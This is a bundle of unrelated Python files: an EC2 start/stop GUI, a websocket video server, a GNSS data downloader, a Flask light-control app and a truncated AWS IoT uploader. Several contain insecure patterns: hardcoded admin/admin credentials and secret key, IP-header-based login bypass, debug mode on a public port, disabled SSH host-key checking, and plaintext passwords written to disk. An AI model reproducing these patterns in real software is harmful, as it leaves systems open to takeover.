os.execl(python, python, *sys.argv)
else:
self._logger.info('Consumer exiting.')
def check_worker_health(self):
"""
Check the health of the worker processes. Workers that have died will
be replaced with new workers.
"""
self._logger.debug('Checking worker health.')
workers = []
restart_occurred = False
for i, (worker, worker_t) in enumerate(self.worker_threads):
if not self.environment.is_alive(worker_t):
self._logger.warning('Worker %d died, restarting.', i + 1)
worker = self._create_worker()
worker_t = self._create_process(worker, 'Worker-%d' % (i + 1))
worker_t.start()
restart_occurred = True
workers.append((worker, worker_t))
if restart_occurred:
self.worker_threads = workers
else:
self._logger.debug('Workers are up and running.')
if not self.environment.is_alive(self.scheduler):
self._logger.warning('Scheduler died, restarting.')
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
self.scheduler.start()
else:
self._logger.debug('Scheduler is up and running.')
return not restart_occurred
def _set_signal_handlers(self):
signal.signal(signal.SIGTERM, self._handle_stop_signal)
signal.signal(signal.SIGINT, signal.default_int_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, self._handle_restart_signal)
def _handle_stop_signal(self, sig_num, frame):
self._logger.info('Received SIGTERM')
self._received_signal = True
self._restart = False
self._graceful = False
def _handle_restart_signal(self, sig_num, frame):
self._logger.info('Received SIGHUP, will restart')
self._received_signal = True
self._restart = True
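# A minimal usage sketch (assumes a configured Huey instance; RedisHuey below is illustrative):
#     from huey import RedisHuey
#     huey = RedisHuey('my-app')
#     consumer = Consumer(huey, workers=4, worker_type='thread')
#     consumer.run()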
|
Miranda_Ubuntu_aws_sshrdp_UIv7.py
|
# --- The MIT License (MIT) Copyright (c) Sat May 3 02:14:00am 2020 ---
# This program provides users of the Amazon Web Service (AWS) EC2 service with a
# simple GUI to quickly start/stop each EC2 instance (virtual machine) by its
# instance ID, using a per-instance profile file. Create a custom text file with
# the .aws extension (e.g. username1.aws) in the %userprofile%\.aws\ folder that
# holds the credential profile name, instance ID, region and password, and run
# "aws configure" with the AWS CLI so that %userprofile%\.aws\credentials exists
# and grants the program access to AWS.
from tkinter import Tk, LabelFrame, Label, Entry, Button, StringVar
import sys, os, logging, json, threading
import boto3
# === Set the logging output level for the program ===
logging.basicConfig(level=logging.WARNING, format = '%(levelname)s: %(message)s')
#logging.basicConfig(level=logging.INFO, format = '%(levelname)s: %(message)s')
#logging.basicConfig(level=logging.DEBUG, format = '%(levelname)s: %(message)s')
# === Helper to load the aws account/credential profile ==========
def get_awsconfig():
configFiles = [ i for i in os.listdir(os.path.expanduser(r'~/.aws/')) if i.lower().endswith('.aws') ]
if len(configFiles) == 1:
        selectedConfigIndex = 0 # Default to the first config profile
elif len(configFiles) > 1:
while True:
selectedConfig = input(configFiles)
if not selectedConfig:
selectedConfigIndex = 0
break
elif selectedConfig.isdigit():
selectedConfigIndex = int(selectedConfig)
if selectedConfigIndex < len(configFiles):
break
else:
logging.warning(r'你選擇的設定檔號碼 [%s] 超出能選擇的範圖.' % str(selectedConfig))
else:
logging.warning(r'你選擇的設定檔號碼 [%s] 超出能選擇的範圖.' % str(selectedConfig))
else:
logging.warning(r'無法找到你的 aws 使用者帳號與密碼的設定檔 %userprofile%/.aws/*.aws !')
        # === ** For ssh connections, "Password" in the profile must be the path to the .pem key file, for example (* note: with ssh, Password is the .pem file location)
logging.warning(r'設定檔格式 ssh 為: {"Profile":"profile username", "Region":"ap-east-2", "ID":"i-01abc234defg5h6j7", "Password":"C://Users//username//.awscredentials//UbuntuServer1804LTSami-5ad2972b.pem"}')
        # === ** For rdp connections, decrypt the password with the .pem key in the aws console and write the plaintext password into the profile
logging.warning(r'設定檔格式 rdp 為:{"Profile":"profile username", "Region":"ap-east-2", "ID":"i-01abc234defg5h6j7", "Password":"@?b!)axcyNKi1SqICn9oSygPx8k(Zm1e"}')
return None
try:
        configFile = configFiles[selectedConfigIndex] # Use the selected config profile
except Exception:
logging.warning(r'你設定的 aws 使用者帳號與密碼的設定檔: %s 無法使用.' % configFile)
return None
try:
with open(os.path.expanduser(r'~/.aws/%s' % configFile), 'r', encoding='utf-8') as f:
awsprofile = json.load(f)
except Exception:
logging.warning(r'你設定的 aws 使用者帳號與密碼的設定檔: %s 無法使用' % configFile)
return None
if awsprofile['Password'].lower().endswith('.pem'):
if not os.path.isfile(awsprofile['Password']):
logging.warning(r'無法找到你在設定檔裡指定的 aws 伺服器 .pem 金鑰檔: %s' % awsprofile['Password'])
return None
    awsprofile['configFile'] = configFile[:-len('.aws')] # Strip the .aws suffix and return the selected profile name as part of the result
return awsprofile
# === Initialize the aws ec2Instance object ==========
class ec2Instance:
def __init__(self, accountProfile):
self.profileName = accountProfile['Profile']
self.userRegion = accountProfile['Region']
self.instanceID = accountProfile['ID']
self.accountPwd = accountProfile['Password']
self.configFile = accountProfile['configFile']
try:
self.session = boto3.Session(profile_name = self.profileName)
except Exception:
logging.warning(r'無法找到你的 aws credentials 設定檔. 可能需要安裝 aws cli 並執行 aws configure. 這樣才會產生 credentials 文件.')
self.client = None
else:
logging.debug(r'已找到你的 aws credentials 設定檔並用來啟始 ec2 Instance 物件.')
self.client = self.session.client('ec2', region_name = self.userRegion)
    # === Power state and other instance details ===
    def getStastictics(self):
        self.fqdn = '' # ' - not running yet - '
        self.ip = '' # ' - not running yet - '
self.instancedescription = self.client.describe_instances(InstanceIds = [self.instanceID,])
self.status = self.instancedescription['Reservations'][0]['Instances'][0]['State']['Name']
if self.status == 'running':
self.fqdn = self.instancedescription['Reservations'][0]['Instances'][0]['NetworkInterfaces'][0]['Association']['PublicDnsName']
self.ip = self.instancedescription['Reservations'][0]['Instances'][0]['NetworkInterfaces'][0]['Association']['PublicIp']
    # === Start the instance ===
def setRunning(self):
if self.status == 'stopped':
apiResponse = self.client.start_instances(InstanceIds = [self.instanceID,])
if apiResponse['ResponseMetadata']['HTTPStatusCode'] != 200:
logging.error('呼叫 API 錯誤: %s' % apiResponse['ResponseMetadata']['HTTPStatusCode'])
    # === Stop the instance ===
def setStopped(self):
if self.status == 'running':
apiResponse = self.client.stop_instances(InstanceIds = [self.instanceID,])
if apiResponse['ResponseMetadata']['HTTPStatusCode'] != 200:
logging.error('呼叫 API 錯誤: %s' % apiResponse['ResponseMetadata']['HTTPStatusCode'])
# === Build the Tk GUI uiWidgets object =======
class uiWidgets:
def __init__(self, master):
self.master = master
self.master.geometry("%dx%d-%d-%d" % (330, 302, 50, 80))
self.master.resizable(False, False)
self.master.title('%s/%s' % (ec2.configFile, ec2.profileName[ec2.profileName.rfind(' ')+1:]))
        # === Create the variables displayed in the GUI =======
self.startORstop = StringVar()
self.showStatus = StringVar()
self.makeConnection = StringVar()
self.showFQDN = StringVar()
self.showIP = StringVar()
        # === Create the start/stop counter variable =======
self.counter = 0
        # === Create the [Profile] User Profile frame =======
self.userprofileFrame = LabelFrame(self.master, text = '設定檔')
        # === Create the [Profile] instance ID label and text box =======
self.identiferLabel = Label(self.userprofileFrame, text = '載入的 EC2 Inatance ID')
self.identiferLabel.grid(row = 0, column = 0)
self.identiferText = Entry(self.userprofileFrame)
self.identiferText.grid(row = 0, column = 1)
        # === Create the [Profile] region label and text box =======
self.regionalLabel = Label(self.userprofileFrame, text = '該 EC2 Inatance 的 Region')
self.regionalLabel.grid(row = 1, column = 0)
self.regionalText = Entry(self.userprofileFrame)
self.regionalText.grid(row = 1, column = 1)
        # === Pack the [Profile] User Profile frame =======
self.userprofileFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
        # === Insert the [EC2 instance ID text] into the text box =======
self.identiferText.insert(0, ec2.instanceID)
        # === Insert the [EC2 user region text] into the text box =======
self.regionalText.insert(0, ec2.userRegion)
        # === Create the [Start/Stop] switch button =======
self.switchButton = Button(self.master, textvariable = self.startORstop, width = 10, command = self.switchbuttonClicked)
        # === Pack the [Start/Stop] switch button =======
self.switchButton.pack(padx = 10, pady = 5)
        # === Create the [Current state] instance state frame =======
self.instancestatusFrame = LabelFrame(self.master, text = '目前狀態')
        # === Create the [Current state] instance state label and text box =======
self.machinestateLabel = Label(self.instancestatusFrame, text = '目前的 EC2 Inatance 狀態')
self.machinestateLabel.grid(row = 0, column = 0)
        self.machinestateText = Entry(self.instancestatusFrame, textvariable = self.showStatus) # Shows the EC2 instance (virtual machine) State
self.machinestateText.grid(row = 0, column = 1)
        # === Pack the [Current state] instance state frame =======
self.instancestatusFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
        # === Create the [Details] instance description frame =======
self.statisticsFrame = LabelFrame(self.master, text = '細節')
        # === Create the [Details] instance FQDN label and text box =======
self.instanceFQDNLable = Label(self.statisticsFrame , text = '目前 EC2 Inatance 的 FQDN')
self.instanceFQDNLable.grid(row = 0, column = 0)
        self.instanceFQDNNameText = Entry(self.statisticsFrame , textvariable = self.showFQDN) # Shows the EC2 instance (virtual machine) FQDN
self.instanceFQDNNameText.grid(row = 0, column = 1)
        # === Create the [Details] instance IP address label and text box =======
self.instanceIPaddrLable = Label(self.statisticsFrame , text = '目前 EC2 Inatance 的 IP')
self.instanceIPaddrLable.grid(row = 1, column = 0)
        self.instanceIPaddrText = Entry(self.statisticsFrame , textvariable = self.showIP) # Shows the EC2 instance (virtual machine) IP
self.instanceIPaddrText.grid(row = 1, column = 1)
        # === Pack the [Details] instance description frame =======
self.statisticsFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
        # === Create the [Connect to server] make connection button =======
self.connectButton = Button(self.master, textvariable = self.makeConnection, width = 10, command = self.connectbuttonClicked)
        # === Pack the [Connect to server] make connection button =======
self.connectButton.pack(padx = 10, pady = 5)
        # === Refresh all displayed variables =======
self.variablesRefreshing()
    # === Refresh variables ===
def variablesRefreshing(self):
ec2.getStastictics()
if ec2.status in ['running', 'stopped']:
if ec2.status == 'running':
self.startORstop.set('關機 [Stop]')
self.makeConnection.set('連線伺服器')
elif ec2.status == 'stopped':
self.startORstop.set('開機 [Start]')
self.makeConnection.set(' - 尚未開機 - ')
else:
self.makeConnection.set(' - - - - - ')
        self.showStatus.set(ec2.status) # EC2 instance (virtual machine) state
        self.showFQDN.set(ec2.fqdn) # Public FQDN of the EC2 instance (virtual machine)
        self.showIP.set(ec2.ip) # Public IP of the EC2 instance (virtual machine)
def executeTerminal(self):
os.system(self.cmd2exec)
    # === Connect button ===
def connectbuttonClicked(self):
if ec2.status == 'running':
if ec2.accountPwd.lower().endswith('.pem'):
self.cmd2exec = 'ssh -o "ServerAliveInterval 40" -o StrictHostKeyChecking=no -i "%s" ubuntu@%s' % (ec2.accountPwd, ec2.fqdn)
else:
self.cmd2exec = 'cmdkey /generic:%ec2IP% /user:Administrator /pass:"' + ec2.accountPwd + '" && mstsc /admin /v:%ec2IP%'
try:
with open(os.path.expanduser(r'~/.aws/executedCmd.%s.txt' % ec2.configFile), 'w', encoding='utf-8-sig') as f:
                    f.write(self.cmd2exec) # Write the command line to a file; ** note: the rdp command contains the plaintext password
except Exception:
logging.warning('執行下列命令寫入桌面檔案錯誤: %s' % self.cmd2exec)
os.environ['ec2IP'] = ec2.ip
cmd = threading.Thread(target=self.executeTerminal)
cmd.start()
logging.debug('外部命令視窗啟動是否啟動? %s' % cmd.is_alive())
    # === Start/Stop button ===
def switchbuttonClicked(self):
if ec2.status in ['running', 'stopped']:
            if ec2.status == 'running': # If the EC2 instance is currently running
                ec2.setStopped() # -> then stop it
            elif ec2.status == 'stopped':
                ec2.setRunning() # -> otherwise start it
self.countingBtn()
    # === Count refreshes after the start/stop button is pressed ===
def countingBtn(self):
        self.counter += 1 # Increment the counter
        self.startORstop.set('- - %s - -' % str(self.counter)) # Show the counter value on the button
        self.variablesRefreshing() # Refresh the variables shown on screen
        if ec2.status not in ['running', 'stopped']: # The instance is still transitioning, so the operation is not finished yet
            self.btnSwitchId = self.switchButton.after(2000, self.switchbuttonClicked) # Schedule another refresh in 2 seconds (=2000 ms)
        else:
            self.counter = 0
            self.switchButton.after_cancel(self.btnSwitchId) # The operation finished, so cancel the 2-second refresh loop
# === Main program ==========
if __name__ == '__main__':
accountProfile = get_awsconfig()
if accountProfile:
ec2 = ec2Instance(accountProfile)
# You should check if ec2.client is NOT <None> before you do anything with ec2Instance.
        # If no aws credentials were found at initialization, ec2.client is set to None; in that case the program should exit.
if ec2.client:
root = Tk()
appLayout = uiWidgets(root)
root.mainloop()
|
server2.py
|
import tornado.websocket
import tornado.ioloop
import tornado.web
import cv2
import numpy as np
import time
import ctypes
import threading
import multiprocessing
import random
import sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtGui import QImage, QPixmap
from PyQt5.uic import loadUi
import qtvideo as qv
connect_users = set()
tickx = 0
timestart = 0
ticks = 0
def solveQps():
global tickx
global timestart
tickx += 1
if tickx == 60:
sec = time.time() - timestart
fps = round(tickx / sec, 1)
timestart = time.time()
tickx = 0
print(f'fps={fps}')
return True
def saveabp(message):
with open(f'./frame/message.bin', 'ab+') as f:
f.write(message)
websocketPackageNum = 0
drawNum = 0
maxNum = 0
class MyWebSocketHandler(tornado.websocket.WebSocketHandler):
connect_users = set()
def check_origin(self, origin: str):
        '''Override the same-origin check to allow cross-origin requests'''
return True
def open(self):
print("WebSocket opened")
        # When the connection opens, save the user into connect_users
self.connect_users.add(self)
def solveMessage(self, message):
print(message)
def on_message(self, message):
global websocketPackageNum
global dll
messageType = type(message)
# if messageType!=type(b""):
# self.solveMessage(message)
# return
lenmessage = len(message)
global maxNum
if lenmessage > maxNum:
print(f"大包{lenmessage}")
maxNum = lenmessage
# print(f"websocket len={lenmessage}")
inputTime1 = time.time()
dll.inputBuff(message, len(message))
websocketPackageNum += 1
if random.random() > 0.99:
print(f"buffinput耗时={round((time.time() - inputTime1) * 1000)}")
# frame = np.frombuffer(message, 'uint8')
# length = len(frame)
# print(length)
# if length > 20:
#
# else:
# print("jump")
# print(f"message len {length}")
# print(frame)
# print(image)
# print('收到的信息为:')
# exit(0)
def on_close(self):
print("WebSocket closed")
        # When the connection closes, remove the user from connect_users
self.connect_users.remove(self)
def check_origin(self, origin):
        # Allow cross-origin access here
return True
@classmethod
def send_demand_updates(cls, message):
        # Using @classmethod means this can be called without instantiating the class
        # Push the message to all users (modify as needed to push only to specific users)
for user in cls.connect_users:
user.write_message(message)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r'/ws', MyWebSocketHandler)
]
tornado.web.Application.__init__(self, handlers)
# dlls=["lib/avutil-56.dll"]
# for d in dlls:
# ctypes.cdll.LoadLibrary(d)
# import sys
# p=os.path.abspath(os.path.join(os.path.curdir,"lib"))
# sys.path.append(p)
# d=['swresample-3.dll',"swscale-5.dll","avutil-56.dll","avcodec-58.dll","avformat-58.dll",'server8.dll']
# for dd in d:
# funcs=[ctypes.windll.LoadLibrary,ctypes.cdll.LoadLibrary,ctypes.CDLL,ctypes.WinDLL]
# for fun in funcs:
# try:
# fun(dd)
# print(f"{dd}成功")
# break
# except:
# pass
import os
d=["avutil-56.dll",'swresample-3.dll',"swscale-5.dll","avcodec-58.dll","avformat-58.dll",'server8.dll']
for dd in d:
funcs=[ctypes.windll.LoadLibrary,ctypes.cdll.LoadLibrary,ctypes.CDLL,ctypes.WinDLL]
for fun in funcs:
try:
fun(os.path.abspath(os.path.join("./lib",dd)))
print(f"{dd}成功")
break
except:
pass
dll = ctypes.cdll.LoadLibrary( os.path.abspath('./lib/server8.dll'))
# height = 1280
# width = 720
# height = 2220
# width = 1080
FPS = 11
SHAPE = 444
import cmath
import matplotlib.pyplot as plt
import win32api, win32con
screenX = win32api.GetSystemMetrics(win32con.SM_CXSCREEN) # Get the screen resolution on the X axis
screenY = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
def autosize(screenY, screenX, picw, pich):
minsize = min(screenY, screenX)*0.9
maxsize = max(picw, pich)
if maxsize > minsize:
rate = minsize / maxsize
return (int(picw * rate//2*2), int(pich * rate//2*2))
else:
return (picw, pich)
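# Worked example (hypothetical numbers): autosize(1080, 1920, 720, 1280) fits a 720x1280
# frame inside 90% of the smaller screen edge (972 px), returning roughly (546, 972).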
from qtvideo import mywin
from socketserver3 import MysocketServer
threadImg = None
class Mythread(QThread):
breakSignal = pyqtSignal(int)
def __init__(self, queue, size):
super().__init__()
        # Either of the initialization forms below works; some Python versions do not support one of them
        # super(Mythread, self).__init__()
self.queue = queue
self.scrSize = size
def run(self):
global dll
        # Start the socket communication
while True:
size = self.queue.get()
if size.get("size"):
size = size.get("size")
break
else:
self.queue.put(size)
print("ImageThread启动")
w, h = size
print(f"拿到了w={w}h={h}")
scrw, scrh = autosize(self.scrSize[0], self.scrSize[1], w, h)
print(f"自适应分辨率{scrw}x{scrh}")
# scrw,scrh=w,h
global drawNum
global threadImg
dll.init(0, w, h, scrw, scrh)
lastTime = time.time()
print(screenX, screenY)
# cv2.namedWindow("1", flags=cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)
# cv2.resizeWindow("1", scrw, scrh)
tick = 0
bufflen = scrw * scrh * 3
global FPS
buff = ctypes.c_buffer(bufflen)
while True:
try:
drawNum += 1
tick += 1
buffLen = dll.getBuff(buff)
frame = np.frombuffer(buff.raw, 'uint8', count=bufflen)
lenx = len(frame)
solveQps()
img = frame.reshape((scrh, scrw, 3)).astype('uint8')
qv.imageT = img
self.breakSignal.emit(1)
except Exception as e:
print(e)
pass
def hackSocket():
id = 0
with open(f'./frame/message.bin', 'rb') as f:
while f.readable():
message = f.read(200000)
time.sleep(10)
if len(message) <= 1:
break
dll.inputBuff(message, len(message))
id += 1
print(f"包id{id}")
hack = 0
def mainx():
if hack == 2:
pass
elif hack == 1:
t = threading.Thread(target=hackSocket)
t.start()
# cvT.join()
# t.join()
else:
# cvT = threading.Thread(target=cvThread, args=(0,))
# cvT.start()
# app = Application()
# app.listen(20482)
# tornado.ioloop.IOLoop.current().start()
from socketserver3 import MysocketServer
server = MysocketServer("", 20481, dll)
server.start()
app = QtWidgets.QApplication(sys.argv)
window = mywin()
threadx = Mythread()
threadx.breakSignal.connect(window.loadimage)
threadx.start()
window.show()
# window.setGeometry(100,100,400,300)
sys.exit(app.exec_())
#
#
# print("cvThread函数")
# cvThread(0)
server.join()
# cvT.join()
dll.wait()
# else:
if __name__ == "__main__":
if hack == 0:
import buildAndroid2
mul2 = multiprocessing.Process(target=buildAndroid2.mainx)
mul2.start()
mainx()
else:
mainx()
|
http_downloader.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import threading
from ftp_downloader import downloader
from gtime import GTime, GT_list
import pandas as pd
import requests
from queue import Queue
import fcntl
import logging
import time
# TODO: to a package
class HTTP_Downloader():
def __init__(self, threads=2):
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
"Cookie": ""
}
self.threads = threads
self.log = True
def _download_url(self):
# download url [call by threads]
while True:
url = self.queue.get()
file_name = url.split('/')[-1]
save = self.out + os.sep + file_name
if (not self.overwrite) and os.path.exists(save):
self.queue.task_done()
continue
try:
with open(save, 'wb') as f:
fcntl.flock(f,fcntl.LOCK_EX | fcntl.LOCK_NB) # lock file
response = requests.get(url,headers=self.headers)
f.write(response.content)
fcntl.flock(f,fcntl.LOCK_UN) # release lock
f.close()
print('{} -> {}'.format(url, save))
except:
print('Error when downloading {} -> {}'.format(url, save))
if self.log:
logging.warning('Error when downloading {} -> {}'.format(url, save))
if os.path.getsize(save) == 0:
# remove 0 size file
os.remove(save)
self.queue.task_done()
def download_by_urls(self, urls, out='.', overwrite=False):
# download url list by muti-threading
if isinstance(urls, str):
urls = [urls] # change to list
self.out = os.path.realpath(out)
self.overwrite = overwrite
# threads list and queue
thread_list = []
self.queue = Queue()
# put urls to queue
for url in urls:
self.queue.put(url)
print('All URL generated, Downloading...')
# start threads
for i in range(self.threads):
t_parse = threading.Thread(target=self._download_url)
thread_list.append(t_parse)
t_parse.setDaemon(True)
t_parse.start()
# wait until all tasks done
self.queue.join()
return
def main():
"""
Example 1:A simple download
Result: cddis.gsfc.nasa.gov
# /pub/gps/products/2086/igs20864.sp3.Z -> ./igs/igs20864.sp3.Z
# /pub/gps/products/2086/igs20863.sp3.Z -> ./igs/igs20863.sp3.Z
# /pub/gps/products/2086/igs20865.sp3.Z -> ./igs/igs20865.sp3.Z
"""
# 1. Declare a downloader
ftp = downloader()
dl = HTTP_Downloader(threads=10)
# 2. Make the request dictionary
# GNSS Time list
# year 2014-2018
gtl = GT_list(GTime(year=2019,doy=1), GTime(year=2019,doy=365))
# Make request dict
d = {
'GTIME': gtl
}
# 3. URL pattern
p='https://cddis.nasa.gov/archive/gnss/products/ionex/YYYY/DDD/igsgDDD0.YYi.Z'
# 4. Output directory (optional)
out_dir = '/mnt/e/IGS_GIM/igs'
# 5. Url lists
url_list = ftp.generate_urls(pattern=p,dic=d)
# print(url_list)
dl.download_by_urls(url_list, out_dir)
if __name__ == "__main__":
main()
|
Light_Control.py
|
from flask import Flask, g, render_template, request, session, url_for, redirect
import time
import datetime
import threading
import csv
app = Flask(__name__)
app.secret_key = 'somesecretkeythatonlyishouldknow'
app.session_cookie_name = 'MyBeautifulCookies'
authorize_ip = ["localhost", "127.0.0.1", "172.16.32.199"]
buttonSts_p1 = ["/static/img/img_off.png"] * 8
buttonSts_p2 = ["/static/img/img_off.png"] * 8
color = ["#333333"] * 8
class User:
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __repr__(self):
return f'<User: {self.username}>'
users = []
users.append(User(id=1, username='elo', password='elo'))
users.append(User(id=2, username='admin', password='admin'))
def getTime():
t = time.localtime()
current_time = time.strftime("%H:%M", t)
return current_time
@app.before_request
def before_request():
g.user = None
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
for i in authorize_ip:
if ip == i:
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
else :
users.append(User(id=3, username='local', password='local'))
user = [x for x in users if x.id == 3][0]
session['user_id'] = user.id
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
return redirect(url_for('page1'))
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
@app.route("/", methods=['POST', 'GET'])
def login():
current_time = getTime()
if request.method == 'POST':
session.pop('user_id', None)
username = request.form['username']
password = request.form['password']
try:
user = [x for x in users if x.username == username][0]
try:
if user and user.password == password:
session['user_id'] = user.id
return redirect(url_for('page1'))
except:
return redirect(url_for('login'))
except:
return redirect(url_for('login'))
return render_template("login.html", time=current_time)
@app.route("/page1", methods = ['POST', 'GET'])
def page1():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if all(elem == "/static/img/img_on.png" for elem in buttonSts_p1):
buttonSts_p2[0] = "/static/img/img_on.png"
else:
buttonSts_p2[0] = "/static/img/img_off.png"
if request.method == 'POST':
if request.form['button_p1'] == '1':
if buttonSts_p1[0] == "/static/img/img_on.png":
buttonSts_p1[0] = "/static/img/img_off.png"
color[0] = "#333333"
else:
buttonSts_p1[0] = "/static/img/img_on.png"
color[0] = "#FFFFFF"
elif request.form['button_p1'] == '2':
if buttonSts_p1[1] == "/static/img/img_on.png":
buttonSts_p1[1] = "/static/img/img_off.png"
color[1] = "#333333"
else:
buttonSts_p1[1] = "/static/img/img_on.png"
color[1] = "#FFFFFF"
elif request.form['button_p1'] == '3':
if buttonSts_p1[2] == "/static/img/img_on.png":
buttonSts_p1[2] = "/static/img/img_off.png"
color[2] = "#333333"
else:
buttonSts_p1[2] = "/static/img/img_on.png"
color[2] = "#FFFFFF"
elif request.form['button_p1'] == '4':
if buttonSts_p1[3] == "/static/img/img_on.png":
buttonSts_p1[3] = "/static/img/img_off.png"
color[3] = "#333333"
else:
buttonSts_p1[3] = "/static/img/img_on.png"
color[3] = "#FFFFFF"
elif request.form['button_p1'] == '5':
if buttonSts_p1[4] == "/static/img/img_on.png":
buttonSts_p1[4] = "/static/img/img_off.png"
color[4] = "#333333"
else:
buttonSts_p1[4] = "/static/img/img_on.png"
color[4] = "#FFFFFF"
elif request.form['button_p1'] == '6':
if buttonSts_p1[5] == "/static/img/img_on.png":
buttonSts_p1[5] = "/static/img/img_off.png"
color[5] = "#333333"
else:
buttonSts_p1[5] = "/static/img/img_on.png"
color[5] = "#FFFFFF"
elif request.form['button_p1'] == '7':
if buttonSts_p1[6] == "/static/img/img_on.png":
buttonSts_p1[6] = "/static/img/img_off.png"
color[6] = "#333333"
else:
buttonSts_p1[6] = "/static/img/img_on.png"
color[6] = "#FFFFFF"
elif request.form['button_p1'] == '8':
if buttonSts_p1[7] == "/static/img/img_on.png":
buttonSts_p1[7] = "/static/img/img_off.png"
color[7] = "#333333"
else:
buttonSts_p1[7] = "/static/img/img_on.png"
color[7] = "#FFFFFF"
elif request.form['button_p1'] == 'page_2':
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time)
else:
pass
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time)
@app.route("/page2", methods = ['POST', 'GET'])
def page2():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if request.method == 'POST':
if request.form['button_p1'] == '1':
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
elif request.form['button_p1'] == '2':
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
elif request.form['button_p1'] == '3':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8, 2):
color[i] = "#FFFFFF"
color[i + 1] = "#333333"
buttonSts_p1[i] = "/static/img/img_on.png"
buttonSts_p1[i + 1] = "/static/img/img_off.png"
elif request.form['button_p1'] == '4':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i < 3:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else :
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == '5':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i > 3 and i != 7:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else:
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == 'page_1':
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time)
else:
pass
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time)
@app.route("/settings", methods = ['POST', 'GET'])
def settings(setting=None):
if g.user.id == 3:
return redirect(url_for('page1'))
if not g.user.username == "admin":
return redirect(url_for('login'))
current_time = getTime()
if request.method == 'POST':
check1 = request.form.get('Auto on')
time1 = request.form.get('time Auto on')
check2 = request.form.get('Auto off')
time2 = request.form.get('time Auto off')
file = open('config.csv', "w", newline='')
header = ['name','state','param1']
csvf = csv.DictWriter(file, fieldnames=header)
csvf.writeheader()
csvf.writerow({'name': 'Auto on', 'state': check1, 'param1': time1})
csvf.writerow({'name': 'Auto off', 'state': check2, 'param1': time2})
file.close()
return redirect(url_for('page1'))
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
return render_template('settings.html', time=current_time, settings=rows)
@app.before_first_request
def activate_job():
def run_job():
while True:
t = getTime()
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
day = datetime.datetime.today().weekday()
#0 monday / 6 sunday
if rows[0][1] == 'on' and t == rows[0][2] and day < 5:
print("Auto on")
if rows[1][1] == 'on' and t == rows[1][2] and day < 5:
print("Auto off")
time.sleep(60)
thread = threading.Thread(target=run_job)
thread.start()
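# Illustrative note (added): run_job() and settings() assume config.csv looks
# roughly like the sample below (times in HH:MM, matching getTime()):
#
#   name,state,param1
#   Auto on,on,07:30
#   Auto off,on,17:00
#
# On weekdays (Mon-Fri) run_job() checks once per minute and prints
# "Auto on"/"Auto off" when the current time equals param1 and state is 'on'.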
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True,)
|
sensor_offline_storage.py
|
from Queue import Queue
from threading import Thread, Semaphore
import sys
import os
import time
import urllib2
import json
import boto3
import hashlib
import binascii
import pycurl
from OpenSSL import SSL
import random
import datetime
import zymkey
# Global variables for the script
LOGFILE_NAME = 'log.txt'
TOPIC = 'Zymkey'
DEVICE_ID = '1'
IP = '192.168.12.28'
DATA_SEP = '---NEW ITEM---'
FAIL_THRESHOLD = 100
failQ = Queue() # The queue of JSON objects that failed to upload
qSem = Semaphore() # The semaphore for putting and getting from the queue
rwSem = Semaphore() # The semaphore for reading and writing from the log
# Create a log.txt file if it doesn't already exist
cur_dir = os.path.dirname(os.path.realpath(__file__))
log_path = os.path.join(cur_dir, LOGFILE_NAME)
if not os.path.isfile(log_path):
f = open(log_path,"w+")
f.close()
# Variables to setup the AWS endpoint for publishing data
boto3client = boto3.client('iot')
AWS_ENDPOINT = "https://" + str(boto3client.describe_endpoint()['endpointAddress']) + ":8443/topics/" + TOPIC + "?qos=1"
# Function using pycurl to upload data to the topic
def ZK_AWS_Publish(url, post_field, CA_Path, Cert_Path,):
#Setting Curl to use zymkey_ssl engine
c = pycurl.Curl()
c.setopt(c.SSLENGINE, "zymkey_ssl")
c.setopt(c.SSLENGINE_DEFAULT, 1L)
c.setopt(c.SSLVERSION, c.SSLVERSION_TLSv1_2)
#Settings certificates for HTTPS connection
c.setopt(c.SSLENGINE, "zymkey_ssl")
